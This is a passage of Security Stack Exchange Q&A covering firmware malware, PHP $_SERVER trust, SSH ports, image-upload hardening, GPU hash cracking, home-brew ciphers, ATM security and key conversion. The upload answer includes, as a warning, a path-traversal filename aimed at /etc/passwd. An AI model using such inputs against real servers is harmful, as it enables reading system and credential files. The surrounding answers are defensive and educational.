power to issue (sign) certificates yourself, which would appear as if they were issued by Verisign/Thawte/whatever.
{ "source": [ "https://security.stackexchange.com/questions/32114", "https://security.stackexchange.com", "https://security.stackexchange.com/users/9499/" ] }
32,123
I'm just about to switch to a new SSD drive, so I figured it's a good occasion for a really, really fresh start. I reconsidered every installed piece of software, uninstalled lots of crap (surprisingly, my system started to be more responsive ;]), and checked for viruses and stuff (since I didn't want to transfer any malware to my brand new shiny system). During the virus scan, one file popped as suspected, and then I started to wonder... Though I haven't any direct proof that I ever encountered a serious infection, like really weird acts of rebooting/bsods/problems with apps, and I took lots of precautions (always kept my software updated, used firefox's "noscript" extension, kept java turned off, used sandboxes, AV, and so on), maybe something slipped. And if something slipped - all is compromised. All hope is gone... ;] I started to wonder about the current state of malware. Is it capable of spreading on connected USB drives (in that case, all my backups are compromised); spreading through the local network (in which case all my other PCs are compromised too); infecting my restore partition (yay! this is getting scary); infecting my BIOS/UEFI (just enough so it could redownload it's full package and start spreading again)... Are malware authors capable of making viruses such as these? That is, viruses that can spread through all possible devices in such a way to always remain hidden from users and spread unchallenged. Eventually, every machine would be infected; even fresh new ones, machines currently in the factory would be infected, and so on, and so on... Maybe it's already happened. Are our computers living in their own "virus matrix?" The Vitrix? ;] Ok, jokes aside. It's probably impossible to create such software, so let's go back to my original, simpler question, involving only one infected machine: Could any machine, once infected, ever be trusted again?
Theoretically, no, an infected machine cannot be trusted anymore. In practice, wiping out the hard disk (or just removing it and inserting a new one) is often sufficient, although some virus have been known to reflash part of the BIOS, for pure wanton devastation, or to make the virus resistant to disk formatting. Some motherboards will not allow reflashing unless a specific jumper is physically plugged in, which at least protects against hostile reflashing; if unsure, consult the documentation of your motherboard (if you use a laptop, you are probably out of luck). Apart from the BIOS, other devices can have flashable firmwares. A demonstration has been made in the case of some Apple keyboards. While all of this means that a once-corrupted machine can never be really trusted again, it begs the sister question, which is: how come you could trust the machine in the first place ? You don't really know where it has been (at least not with more precision than "some factory in south China"). A possible answer is that if the attacker managed to plant some malware which resisted a complete machine reinstall, then he probably deserves to stay there. At least, this piece of malware has been written by someone who is technically competent, which is refreshing. It would be a great day if you could say the same of a majority of the other software you run on your machine.
{ "source": [ "https://security.stackexchange.com/questions/32123", "https://security.stackexchange.com", "https://security.stackexchange.com/users/21573/" ] }
32,299
Can I 100% rely on $_SERVER[] to be a safe source of data that I do not need to sanitized like I do $_GET[] and $_POST[] ?
This is taken from one of my questions on Stack Overflow: Which $_SERVER variables are safe? Server controlled These variables are set by the server environment and depend entirely on the server configuration. 'GATEWAY_INTERFACE' 'SERVER_ADDR' 'SERVER_SOFTWARE' 'DOCUMENT_ROOT' 'SERVER_ADMIN' 'SERVER_SIGNATURE' Partly server controlled These variables depend on the specific request the client sent, but can only take a limited number of valid values, since all invalid values should be rejected by the web server and not cause the invocation of the script to begin with. Hence they can be considered reliable . 'HTTPS' 'REQUEST_TIME' 'REMOTE_ADDR' * 'REMOTE_HOST' * 'REMOTE_PORT' * 'SERVER_PROTOCOL' 'HTTP_HOST' † 'SERVER_NAME' † 'SCRIPT_FILENAME' 'SERVER_PORT' 'SCRIPT_NAME' * The REMOTE_ values are guaranteed to be the valid address of the client, as verified by a TCP/IP handshake. This is the address where any response will be sent to. REMOTE_HOST relies on reverse DNS lookups though and may hence be spoofed by DNS attacks against your server (in which case you have bigger problems anyway). This value may be a proxy, which is a simple reality of the TCP/IP protocol and nothing you can do anything about. † If your web server responds to any request regardless of HOST header, this should be considered unsafe as well. See How safe is $_SERVER[“HTTP_HOST”]? . Also see http://shiflett.org/blog/2006/mar/server-name-versus-http-host . Entirely arbitrary user controlled values These values are not checked at all and do not depend on any server configuration, they are entirely arbitrary information sent by the client. 'argv' , 'argc' (only applicable to CLI invocation, not usually a concern for web servers) 'REQUEST_METHOD' ‡ 'QUERY_STRING' 'HTTP_ACCEPT' 'HTTP_ACCEPT_CHARSET' 'HTTP_ACCEPT_ENCODING' 'HTTP_ACCEPT_LANGUAGE' 'HTTP_CONNECTION' 'HTTP_REFERER' 'HTTP_USER_AGENT' 'AUTH_TYPE' § 'PHP_AUTH_DIGEST' § 'PHP_AUTH_USER' § 'PHP_AUTH_PW' § 'PATH_INFO' 'ORIG_PATH_INFO' 'REQUEST_URI' (may contain tainted data) 'PHP_SELF' (may contain tainted data i.e. /index.php/evilstring) 'PATH_TRANSLATED' any other 'HTTP_' value ‡ May be considered reliable as long as the web server allows only certain request methods. § May be considered reliable if authentication is handled entirely by the web server. The superglobal $_SERVER also includes several environment variables. Whether these are "safe" or not depend on how (and where) they are defined. They can range from completely server controlled to completely user controlled.
{ "source": [ "https://security.stackexchange.com/questions/32299", "https://security.stackexchange.com", "https://security.stackexchange.com/users/21768/" ] }
32,308
Is there any advantage in changing the SSH port, I've seen people do that, but I can't seem to find the reason why. If you have a strong password and/or a certificate, is it useful for anything? Edit: I should also mention that I am using iptables rules to limit brute forcing attacks, only 5 login attempts are allowed per minute per IP address.
The Internet is a wild and scary place, full of malcontents whose motives range from curiosity all the way to criminal enterprise. These unsavories are constantly scanning for computers running services they hope to exploit; usually the more common services such as SSH, HTTP, FTP, etc. The scans typically fall into one of two categories: Recon scans to see what IP address have those services open. Exploit scans against IP addresses who have been found to be running a specific service. Considering how large the Internet is it is typically infeasible to look on every port of every IP address to find what's listening everywhere. This is the crux of the advice to change your default port. If these disaffected individuals want to find SSH servers they will start probing each IP address on port 22 (they may also add some common alternates such as 222 or 2222). Then, once they have their list of IP addresses with port 22 open, they will start their password brute force to guess usernames/passwords or launch their exploit kit of choice and start testing known (at least to them) vulnerabilities on the target system. This means that if you change your SSH port to 34887 then that sweep will pass you on by, likely resulting in you not being targeted by the followup break-in. Seems rosy right? There are some disadvantages though. Client Support: Everybody who connects to your server will need to know and use the changed port. If you are in a heavily managed environment, this configuration can be pushed down to the clients, or if you have few enough users it should be easy to communicate. Documentation Exceptions: Most network devices, such as firewalls and IDSes, are pre-setup for common services to be run on common ports. Any firewall rules related to this service on this device will need to be inspected and possibly modified. Similarly, IDS signatures will be tweaked so as to only perform SSH inspection on port 22. You will need to modify every signature, every time they are updated, with your new port. (As a data point there are currently 136 VRT and ET snort signatures involving SSH). System Protections: Modern Linuxes often ship with an kernel layer MAC and/or RBAC systems (e.g. SELinux on RedHat based or AppAmor on Debian based) and that are designed to only allow applications to do exactly what they're intended to do. That could range from accessing the /etc/hosts file, to writing to a specific file, or sending a packet out on the network. Depending on how this system is configured it may, by default, forbid sshd from binding to a non-standard port. You would need to maintain a local policy that would allow it. Other Party Monitoring: If you have an external Information Security division, or outsource monitoring, then they will need to be made aware of the change. When performing a security assessment, or analyzing logs looking for security threats, if I see an SSH server running on a non-standard port (or an SSH server on a non-UNIX/Linux for that matter) I treat it as a potential backdoor and invoke the compromised system part of incident handling procedure. Sometimes it is resolved in 5 minutes after making a call to the administrator and being told it's legitimate, at which point I update documentation, other times it really is badness that gets taken care of. In any event, this can result in down-time for you or, at the least, a nerve racking call when you answer your phone and hear, "Hi, this is Bob from the Information Security Office. I have a few questions for you." Before changing your port you need to take all of this into account so you know you're making the best decision. Some of those disadvantages may not apply, but some certainly will. Also consider what you're trying to protect yourself against. Often times it is simply easier to just configure your firewall to only allow access to 22 from specific hosts, as opposed to the whole Internet.
{ "source": [ "https://security.stackexchange.com/questions/32308", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20038/" ] }
32,367
Is it there any difference between the encrypted Google search (at https://encrypted.google.com ) and the ordinary HTTPS Google search (at https://google.com )? In terms of security what were the benefits of browsing through encrypted Google search? Note that this is not a question about HTTP vs HTTPS . These are two Google services.
According to Google , the difference is with handling referrer information when clicking on an ad. After a note from AviD and with the help of Xander we conducted some tests and here are the results 1. Clicking on an ad: https://google.com : Google will take you to an HTTP redirection page where they'd append your search query to the referrer information. https://encrypted.google.com : If the advertiser uses HTTP, Google will not let the advertiser know about your query. If the advertiser uses HTTPS, they will receive the referrer information normally (including your search query). 2. Clicking on a normal search result: https://google.com : If the website uses HTTP, Google will take you to an HTTP redirection page and will not append your search query to the referrer information. They'll only tell the website that you're coming from Google. If it uses HTTPS, it will receive referrer information normally. https://encrypted.google.com : If the website you click in the results uses HTTP, it will have no idea where you're coming from or what your search query is. If it uses HTTPS, it will receive referrer information normally. The same topic was covered in an EFF blog post . EDIT : Google dropped encrypted.google.com as of April 30 2018. According to Google , this domain was used to give users a way to securely search the internet. Now, all Google products and most newer browsers, like Chrome, automatically use HTTPS connections.
{ "source": [ "https://security.stackexchange.com/questions/32367", "https://security.stackexchange.com", "https://security.stackexchange.com/users/11679/" ] }
32,433
Statement 1 There is a start up called PixelPin . On the web site it reads: The PixelPin solution is simple and quick to use, yet very secure. PixelPin eliminates the traditional alphanumeric password by using a picture based approach. The user chooses an image that’s personal to them (e.g. a photograph of their family or a memorable holiday photo). They then choose 4 points (Passpoints) in sequence on the image. The PixelPin process eliminates the risk of phishing, dictionary attacks and brute force hacking . There’s also a growing body of academic research suggesting that people remember Passpoints on a personal image more easily given the emotional connection evoked during the process. Statement 2 However, Cleopatra , a certificate manager for OpenPGP and X.509 (S/MIME) and common crypto dialogs, says that Photos give a false sense of security. Statement 1 seems to contradict Statement 2. Question: what is this noise about picture-based authentication. Is it secure to use or not?
The two statements speak of completely different things. They don't contradict each other. That does not make them both true, though. PixelPin: this product apparently replaces the password by the selection of four positions on a picture. This means that you choose a picture, and your "password" is the sequence of coordinates for four points you choose on the picture. Since users cannot be relied upon to always click on the exact same pixel, especially since they claim support for touch screens, one must assume that the pixel selection is kind of fuzzy. If we suppose a full-screen picture on a smartphone, we can hope for, say, 200 possible selection points in the picture (it is as if the click from the user fell on a 20x10 grid). The implementation must do something smart to avoid threshold effects (when the user chooses a selection point which is close to the boundary between two grid elements). Four selection points then means 200 4 possible "passwords", i.e. an entropy of a bit more than 30 bits. While this is not bad, as far as passwords go, this is not exactly the most robust password ever. An important point to make is that human users are unlikely to choose "really random" points on the picture. As the example on the page shows, human users will click on the cat's nose, not on a random place in the back wall, if only to be able to click again on it at the next login attempt. I seriously doubt that in real conditions, human users would achieve enough randomness in their selection to defeat brute force attacks. The PixelPin company claims that using a user-chosen picture makes it easier for users to remember their points; that I am ready to believe. They talk about the Picture Superiority Effect , a pompous name for the fact that humans are apes and apes are very visual animal -- primates have had good vision for about 50 millions of years, while writing is human-only and no older than about 6000 years. It is no surprise that human memory groks pictures efficiently. Our ancestors were highly trained to remember how a lion looks like (let's say that the career of those who could not remember that was, on average, shorter). Overall, I find the claims of PixelPin a bit bold, quite possibly outrageous. The idea is interesting, though. The picture in certificates is something else. A certificate is about binding an identity with a public key . A picture could be thought as part of the identity. The people at Kleopatra states that they don't want to support pictures for several reasons, among which the idea that photos give a "false sense of security". What they mean is that a photo is a reasonable part of the identity of a person only insofar as the issuing CA checked that the photo was really that of the target person. This seems dubious, unless the issuing CA took the photo itself. Right now , with certificates as they are used today, photos in certificate are merely advertising; they are pictures of what the certificate holder would like to look like , and not pictures of the key owner as he really is. Briefly said, pictures in certificates tend to give users warm fuzzy feelings about some assumed enhanced security (by analogy with ID tags and passports, mostly), but these feelings are largely unsubstantiated. Kleopatra developers feel it their duty to protect users against such things, hence the absence of support. (Or possibly they were just lazy and did not want to implement the support for pictures.) This is completely different from what pictures are used in PixelPin. PixelPin is about pictures as support for human memory . Kleopatra is talking about pictures as part of the physical identity .
{ "source": [ "https://security.stackexchange.com/questions/32433", "https://security.stackexchange.com", "https://security.stackexchange.com/users/2553/" ] }
32,691
"Your password can't contain spaces." is a message I see from some websites, including 1 . Why? (This question is very similar to Why Disallow Special Characters In a Password? , but the answers there don't seem to apply to the space character). Some systems apparently strip out all spaces before hashing the password. ( How does Google not care about "spaces" in Application-specific passwords? ) Why not simply hash whatever the user typed in, spaces and all?
I can't explain it as anything beyond legacy madness, or lazily copying username restrictions to password restrictions without forethought. Any block of data, printable or otherwise, should be acceptable if you're hashing your passwords. The only restrictions should be a minimum complexity and a "sanity" maximum length so somebody doesn't soak up 1MB of bandwidth (and the corresponding CPU time to hash the input because you use a slow algorithm, right?) every time they login.
{ "source": [ "https://security.stackexchange.com/questions/32691", "https://security.stackexchange.com", "https://security.stackexchange.com/users/1571/" ] }
32,768
If I use the following openssl req -x509 -days 365 -newkey rsa:2048 -keyout private.pem -out public.pem -nodes I get private.pem and public.pem If I use ssh-keygen -t rsa -f rsa I get rsa and rsa.pub Is it possible to convert from the format of rsa to private.pem and vice-a-versa? Edit: To be more specific, a) If I have the private.pem and public.pem generated by the above command, how do I get the equivalent rsa private key and public key? b) Given the rsa and rsa.pub , how do I get the x509 keys if I do know the additional metadata that the above openssl command takes in? If I go from the openssh format to x509 and back, I should ideally get the same key file back.
You are missing a bit here. ssh-keygen can be used to convert public keys from SSH formats in to PEM formats suitable for OpenSSL. Private keys are normally already stored in a PEM format suitable for both. However, the OpenSSL command you show generates a self-signed certificate . This certificate is not something OpenSSH traditionally uses for anything - and it definitely is not the same thing as a public key only. OpenSSH does have support for certificates as well, but it is likely that you are not using this support. Also, these certificates are not X.509, so they are incompatible with OpenSSL. The certificate contains information that is not present anywhere else and each certificate is unique and can not be recreated at will. This means that you need to store the X.509 certificate, in addition to the private key, if you wish use the same key for both OpenSSL and OpenSSH. If you just want to share the private key, the OpenSSL key generated by your example command is stored in private.pem , and it should already be in PEM format compatible with (recent) OpenSSH. To extract an OpenSSH compatible public key from it, you can just run: ssh-keygen -f private.pem -y > private.pub If you want to start from OpenSSH and work your way over to the OpenSSL side, with a self-signed certificate (for whatever reason), here's how: $ ssh-keygen -f test-user Generating public/private rsa key pair. Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in test-user. Your public key has been saved in test-user.pub. The key fingerprint is: ff:36:f1:74:c7:0d:4e:da:79:5c:96:27:2c:2c:4e:b6 naked@tink The key's randomart image is: +--[ RSA 2048]----+ | | | | | . . .| | + o =.+| | S+ o * B+| | .E o = B| | . + o.| | .o . | | ... | +-----------------+ $ openssl req -x509 -days 365 -new -key test-user -out test-user-cert.pem You are about to be asked to enter information that will be incorporated into your certificate request. What you are about to enter is what is called a Distinguished Name or a DN. There are quite a few fields but you can leave some blank For some fields there will be a default value, If you enter '.', the field will be left blank. ----- Country Name (2 letter code) [AU]: State or Province Name (full name) [Some-State]: Locality Name (eg, city) []: Organization Name (eg, company) [Internet Widgits Pty Ltd]: Organizational Unit Name (eg, section) []: Common Name (e.g. server FQDN or YOUR name) []: Email Address []: $ ls -l test-user* -rw------- 1 naked naked 1675 Mar 18 21:52 test-user -rw-r--r-- 1 naked naked 1229 Mar 18 21:53 test-user-cert.pem -rw-r--r-- 1 naked naked 392 Mar 18 21:52 test-user.pub From these, both test-user and test-user-cert.pem files are critical to preserve, where as test-user.pub can always be recreated from test-user as needed.
{ "source": [ "https://security.stackexchange.com/questions/32768", "https://security.stackexchange.com", "https://security.stackexchange.com/users/22142/" ] }
32,779
I was reading this interesting question: Is my developer's home-brew password security right or wrong, and why? It shows a weak home-brew algorithm developed by "Dave", and the answers discuss why this is a bad idea. (Actually hashing algorithm rather than encryption, but my question applies to both.) It makes sense to me that a home-brew algorithm is a very bad idea, but there's one thing I'm not understanding. Assume I'm an attacker, and I am faced with an weak-but-unknown encryption algorithm developed by "Dave". How would I crack it? I wouldn't even know where to begin. It would be a seemingly meaningless string of characters. For example, say that the home-brew algorithm is like this: Use a weak well-known encryption algorithm on the original data, then: Do a bitwise-negative on any byte whose serial number in the file has a repeated digit sum which is prime. (Or any other such mathematical manipulation, this is just an example.) How would one hack a file produced by such an algorithm without knowing it in advance? Edit: Everybody, please don't try to convince me of how hard it is to keep an algorithm secret. Please answer this question on the assumption that the algorithm is kept completely secret, despite of how difficult that is to achieve in real life. Also, assume that I have no access at all to the algorithm, only to the resulting data.
Assume I'm an attacker, and I am faced with an weak-but-unknown encryption algorithm developed by "Dave". How would I crack it? I wouldn't even know where to begin. It would be a seemingly meaningless string of characters. That's correct, you wouldn't. Here's some encrypted data (4587556841584465455874588). Got a clue what that means? Absolutely not. However, you're missing the core, fundamental most integrally important central pillar key to the universe that holds cryptography together. The idea is simple: the key is everything That's it. That's the bit you have to protect. The bit you must guard with your life and hope nobody is going to hit you with a hammer until you tell them what it is. On this basis, you must assume that your algorithim can be read by the attacker. They know how it works. They can document its process. If there are any weaknesses, they'll find them. And they'll exploit them. Like that angry CIA Dad from Taken. This, it turns out, is less of an assumption and more of the practical case in use. Dave, the home brew cryptographer, wants to include an encryption algorithm in his program. Deciding to eschew all the testing and design work cryptographers have done for him for free over the years, he writes something involving the odd xor, compiles his program and helpfully gives it to friends. That algorithm is now in their hands. Game over. Now, you might ask "can't I just keep the algorithm secret? That'll work, right?" Oh Dave, plz stop. Nonono. The problem with secret algorithms is that they're much more likely to be stolen . After all, the key is different for each user (actually, this is not a requirement, but, let's just assume it is for simplicity) but the algorithm remains unchanged. So you only need one of your implementations to be exposed to an attacker and it is game over again. Edit : Ok, in response to the OP's updated question. Let us assume for a moment that the algorithm is totally unknown. Each of the two participants in an encrypted conversation have perfect security of their algorithm implementation. In this case, you've got data to analyse. You could do any one of the following: Analyze for frequently known letters . This is how you'd break a typical caesar-shift cipher. Attempt to guess the length of the key. With this information, you can move into looking for repeated ciphertext blocks which may correspond to the same plaintext. Attempt index of coincidence and other such measures used to break the vigenere cipher, since many polyalphabetic ciphers are (possibly) just variants of this. Watch for patterns. Any pattern might give you the key. Look for any other clues. Do the lengths correspond to a certain measure, are they for example multiples of a certain value such as a byte boundary and so are (possibly) padded? Attempt to analyze with one of the symmetric cipher cryptanalysis techniques . These rely on knowing the algorithm in many cases, so may not apply here. If you believe the the data in question represents a key exchange, you can try one of the many techniques for breaking public key algorithms . The fact is that a short piece of data from an unknown algorithm could well be undecryptable. However, this does not mean you should rely on this being the case. The more data a cryptanalyst can recover, the more likely they are to break your algorithm. You probably don't know without serious cryptanalysis what that boundary is - for example, it is reasonable to assume that one could bruteforce a caeser-cipher algorithm for three letter words, since there are few that make sense. You are up against re-use problems too. In WWII, the Engima overcame this problem by having programmable settings for their secret algorithm, but this was broken too. There is also the human element of cryptography to consider. I realise the label on the tin says "use once, do not digest" etc, but humans are humans and will likely use twice, three times etc. Any such behaviour plays into the hands of the cryptanalyst.
{ "source": [ "https://security.stackexchange.com/questions/32779", "https://security.stackexchange.com", "https://security.stackexchange.com/users/16116/" ] }
32,816
What is it about GPUs that lets them crack passwords so quickly? It seems like the driving force behind adopting good key-derivation functions for passwords (bcrpyt, PBKDF2, scrypt) instead of yesterday's cryptographic hash (MD*, SHA*) is that the later are vulnerable to programs that run on GPUs and guess huge numbers of passwords extremely quickly. Why should GPUs happen to be so much better at evaluating those hash functions than CPUs?
To complete @Terry's answer: a GPU has a lot of cores (hundreds). Each core is basically able to compute one 32-bit arithmetic operation per clock cycle -- as a pipeline . Indeed, GPU work well with extreme parallelism : when there are many identical work units to perform, actually many more than actual cores ("identical" meaning "same instructions", but not "same data"). Some details , for a somewhat old NVidia card (a GTX 9800+, from early 2009): there are 128 cores, split into 16 "multicore units". Each multicore can initiate 8 operations per cycle (hence the idea of 128 cores: that's 16 times 8). The multicore handles work units ("threads") by groups of 32, so that when a multicore has an instruction to run, it actually issues that instruction to its 8 cores over 4 clock cycles. This is operation initiation : each individual operation takes up to 22 clock cycles to run. You can imagine the instruction and its operands walking into the circuit as an advancing front line, like a wave in a pool: a given wave will take some time to reach the other end of the pool, but you can send several waves sequentially. So you can maintain the rhythm of "128 32-bit operations per cycle" only as long as you have at least 22 times as many "threads" to run (i.e. a minimum of 22·128 = 2816), such that threads can be grouped by packs of 32 "identical" threads which execute the same instructions at the same time, like hip-hop dancers. In practice, there are some internal thresholds and constraints which require more threads to achieve the optimal bandwidth, up to about 4096. I could achieve close to 99% of the optimal bandwidth with a SHA-1 implementation. SHA-1 uses a bit more than 1100 32-bit operations (that would be around 900 on a CPU, but a GTX 9800+ has no rotation opcode, so rotations must be split into two shifts and a logical or), and the GPU ran at 1450 MHz, for a grand total of about 160 million SHA-1 computations per second. This can be achieved only as long as you have millions of SHA-1 instances to compute in parallel, as is the case for password cracking (at any time, you need 4096 parallel SHA-1 to feed the GPU cores, but you also have to deal with I/O costs for input of potential passwords, and these costs will dominate if you do not have a lot of SHA-1 instances to process). The host PC, on its CPU (a quad-core 2.4 GHz Intel Core2), could achieve about 48 million SHA-1 per second, and that was with thoroughly optimized SSE2 code. A single SHA-1 will use about 500 clock cycles on such a CPU (the CPU can compute several instructions in a single cycle, provided they don't compete for resources and don't depend on each other), but, for password cracking, it is worthwhile to use SSE2 with its 128-bit registers, and able to compute 4 instructions in parallel. With SSE2 constraints, it takes about 800 clock cycles to run four parallel SHA-1, so that's 200 clock cycles per SHA-1 instance. There are four cores in that CPU and the whole thing runs at 2400 MHz, hence 48 million per second. More recent hardware will be faster, but GPU more so. A GTX 680 sports a whooping 1536 cores, and there are two such GPU in a GTX 690. We are talking billions of SHA-1 instances per second here. (For comparison, I also did an implementation of SHA-1 on the Cell processor , i.e. the CPU in a PS3 console, with its 8 "SPU" coprocessors. One SPU was not available. With the 7 others, I reached about 100 million SHA-1 per second, i.e. better than a contemporary big PC CPU, but not as good as a good GPU of the same era.) Summary: GPU achieve great performance by using heavy parallelism, with hundreds (if not thousands) of cores. This is made possible by pipelining (each individual operation takes many cycles to run, but successive operations can be launched like trucks on a highway) and sharing instruction decoding (since many cores will run the same instructions at the same time).
{ "source": [ "https://security.stackexchange.com/questions/32816", "https://security.stackexchange.com", "https://security.stackexchange.com/users/4722/" ] }
32,852
My client wants a photography site where users can upload their photos in response to photography competitions. Though technically this isn't a problem, I want to know the risks associated with allowing any user to upload any image onto my server. I've got the feeling the risks are high... I was thinking of using something like this http://www.w3schools.com/php/php_file_upload.asp If I do let anonymous users upload files, how can I secure the directory into which the images (and potentially malicious files) will be uploaded?
The biggest concern is obviously that malicious users will upload things that are not images to your server. Specifically they might upload executable files or scripts which they will attempt to trick your server into executing. One way to protect against this is to make sure that the files are not executable after you move_uploaded_file in PHP. This is as simple as using chmod() to set 644 permissions. Note that a user can still upload PHP scripts or other scripts and trick Apache into executing them depending on your configuration. To avoid this, call getimagesize() on the files after they are uploaded and determine what file type they are. Rename the files to a unique filename and use your own extension . That way, if a user uploads evil.jpg.php , your script will save that as 12345.jpg and it won't be executable. Better yet, your script will not even touch it as it will be an invalid JPEG. I personally always rename uploaded images to either the current timestamp from time() or a UUID. This also helps prevent against very evil filenames (like someone trying to upload a file they've named ../../../../../../../../etc/passwd ) As further protection you can use what's sometimes known as an "Image Firewall". Basically this involves saving uploaded images to a directory which is outside the Document Root and displaying them via a PHP script which calls readfile() to display them. This might be a lot of work but is the safest option. A secondary concern is users uploading too many files or files which are too large, consuming all the disk space available or filling the hosting user's quota. This can be managed within your software, including limiting the size of individual files, the amount of data one user can upload, the total size of all uploads, etc. Make sure the website admin user has a way to manage and delete these files. Do not rely on any of the data in $_FILES . Many sites tell you to check the mime type of the file, either from $_FILES[0]['type'] or by checking the filename's extension. Do not do this . Everything under $_FILES with the exception of tmp_name can be manipulated by a malicious user . If you know you want images only call getimagesize as it actually reads image data and will know if the file is really an image. Do not rely on checking the HTTP Referrer for any security. Many sites advise you to check to make sure that the referrer is your own site to ensure that the file is legitimate. This can easily be faked. For further information, here are some good articles: http://software-security.sans.org/blog/2009/12/28/8-basic-rules-to-implement-secure-file-uploads/ http://nullcandy.com/php-image-upload-security-how-not-to-do-it/ http://www.acunetix.com/websitesecurity/upload-forms-threat/ http://josephkeeler.com/2009/04/php-upload-security-the-1x1-jpeg-hack/
{ "source": [ "https://security.stackexchange.com/questions/32852", "https://security.stackexchange.com", "https://security.stackexchange.com/users/22257/" ] }
32,902
Question If one installs a VM with "high security" on a host machine with "low security" , will the VM be only as secure as the machine it's installed on, or will the high-security aspects from the VM (e.g. latest service-packs and updates, anti-virus software, firewall, etc.) compensate for the fallibility of the host? Background In my line of work, I occasionally need to remotely access customer sites. Customers vary in their remote access processes. Some use dialup, some use VPN and some use web portals. The customers also vary in their security procedures; some are fairly relaxed and some are far more rigid. I have recently been asked to connect to a site via a web portal that does a sweep of my machine, looking for various things such as: Approved OS level Approved Firewall installed and active Approved anti-virus software, spyware software, etc. Several other factors I discovered that my local machine's OS (Windows 8) is not supported by the tool; it looks for "More recent operating systems, such as Windows 7". My guess is the tool is a bit out of date... It also didn't detect our corporate firewall. Anyway, the customer site recommended that I use VMWare on my machine and install an XP VM. I did this and it did pass all the security restrictions from the web portal. Possible duplicates: Would running VMs inside of VMs be a more secure way to study viruses, etc? and How secure are virtual machines really? False sense of security?
The host machine can impact and alter whatever it wishes in the guest VM. The host can read and write all the memory of the guest, stop and restart it on a per-instruction basis, and, by nature, sees every single data byte which enters or exits the guest. There is nothing which the OS in a guest VM can do to protect itself against an hostile host. Thus, if the host is vulnerable and subverted (an hostile attacker takes control), then the guests are toast. In your specific case , be assured that if the "protection software" is not aware of the existence of Windows 8, then it is indeed too old to be much good against virus. I bet your customer knows it, too; by recommending a workaround (the VM with Windows XP), he is showing you how work can still be done without having to openly rebel against a company policy. In big organizations, there are often legacy policies which outlast their usefulness by years but can be removed only by waiting for the responsible people to retire or be fired.
{ "source": [ "https://security.stackexchange.com/questions/32902", "https://security.stackexchange.com", "https://security.stackexchange.com/users/6220/" ] }
32,917
I'm curious why an ATM computer is considered secure. The general adage of "If an attacker has physical access to my machine, all bets are off," seems to not apply in this circumstance (since everyone has physical access to the machine). Why is this? I thought of the fact that many have security cameras placed over them, but this doesn't seem sufficient to keep ATMs secure, as there is no one constantly watching the camera feed and looking for suspicious behavior. The most this could be used for is identifying an attacker after an attack has been attempted. It seems like this is fairly easily solved through plain clothes, a mask, gloves, etc. So if this alone isn't or shouldn't be enough of a deterrent, why do we not see ATMs getting hacked for all their cash at 4:00am? What makes the device so secure? Is it just a simple risk-reward analysis, where the cash in the ATM isn't worth the effort of the hack? Or is there more to it which makes the computer secure? Also, I noted that there have been a couple questions about ATM security (like this one and this one ), but mine is about the physical security of the machine, since it violates a common security principle, not anything network related.
I think the assumption here is wrong. They don't have physical access to the machine. They have supervised access to a very limited control panel for a machine which is built into a bomb-proof safe, bolted to the ground and hooked up to an alarm system with an armed response force. Get the machine out of the vault and away from supervision and then yes... all bets are off.
{ "source": [ "https://security.stackexchange.com/questions/32917", "https://security.stackexchange.com", "https://security.stackexchange.com/users/16239/" ] }
32,928
I received a pretty blatantly spammy email to my Gmail account. Attached to the email is a supposed HTML file. My first hunch was that it was probably one of the following: A nasty executable file masquerading as a simple HTML file, or An actual HTML file meant to be opened in a browser in a phishing attack My guess is that it really is an HTML file, since Gmail claims the attachment is only 1K in size. I know I should probably just mark this as spam and get on with my life, but my curiosity is getting the best of me... I really want to know what's in that attachment. Is there a safe way to go about downloading it to a sandboxed location and inspecting the contents? I'm at the beginning of a career shift into the security field, and I would love to pick apart this real world example of something potentially nasty and see how it ticks. I'm thinking a LiveCD or a VM would be a safe environment... I would prefer to do it in a clean, un-networked environment, but in any case, I'll still be logging into my Gmail account to download the thing. Any suggestions?
It could also be: 3. HTML page with JavaScript code attempting exploit a vulnerability in your browser . 4. HTML page with an embedded Java applet attempting to exploit a vulnerability in the JVM 5. HTML page with an embedded Flash file attempting to exploit a vulnerability in Flash Player 6. The email itself, before you open the attachment could try to exploit a vulnerability in your email client There might be other possibilities. For this purpose, I have the following setup: Virtual Machine using VirtualBox . No network access. I have a snapshot saved for the VM after a fresh OS install. I also take two snapshots with What Changed? and TrackWinstall . I copy files only in the direction Host -> VM, using a free ISO creator . I create the .iso file and mount it. Then I can have all the fun I want on the VM itself. I usually run the malware and study memory usage, CPU load, listening ports, networking attempts. I check the changes to the OS using What Changed? and TrackWinstall. Finally I restore to the fresh snapshot. The reason I have the whole setup is because I like to run the malware and see what it's trying to do. Update: I was talking to a colleague who performs malware analysis as a hobby and he told me about his setup, it might be different that what you might want for an occasional .html attachment check. Old PC with a fresh OS install. After installing the needed tools he takes a full-disk image using Clonezilla Live . What Changed for snapshots comparisons. The PC is connected to the Internet through a separate network. Whenever he finishes working on a sample, he reboots with Clonezilla and restores the full-disk image.
{ "source": [ "https://security.stackexchange.com/questions/32928", "https://security.stackexchange.com", "https://security.stackexchange.com/users/22332/" ] }
33,044
I've had a look at several signature schemes (DSA, ECDSA for the most common ones), and am wondering about whether there exist a scheme that would have the following properties : Be asymmetric (one need a private key to sign, one can verify with a public key) Have a very short signature size (less than 50 bits) Be secure by today's standards (hard to find the private key knowing a signature and the signed text) I wouldn't even care if several signatures were valid for one text, as long as they are verifiable with the public key. My intuition is that that "being" secure is inherently linked to the size of the encryption key, which itself has an impact on the size of the signature. As far as I could see, ECDSA gives shorter signatures than DSA with the same level of security, but the signatures are still too big for my use... Any thoughts / links to signature schemes welcome. edit: I read about BLS at some point too, but couldn't really find out whether it is doable to get a scheme secure enough with a signature less than 50 bits long. edit2 : I should add that the goal is to use that for a OTP scheme, so the size of messages to sign would be small (< 512 bytes), and collisions wouldn't be a big problem : assuming the two parties know the message, I'd want for one of them to verify that the other has a private key, using a very short signature.
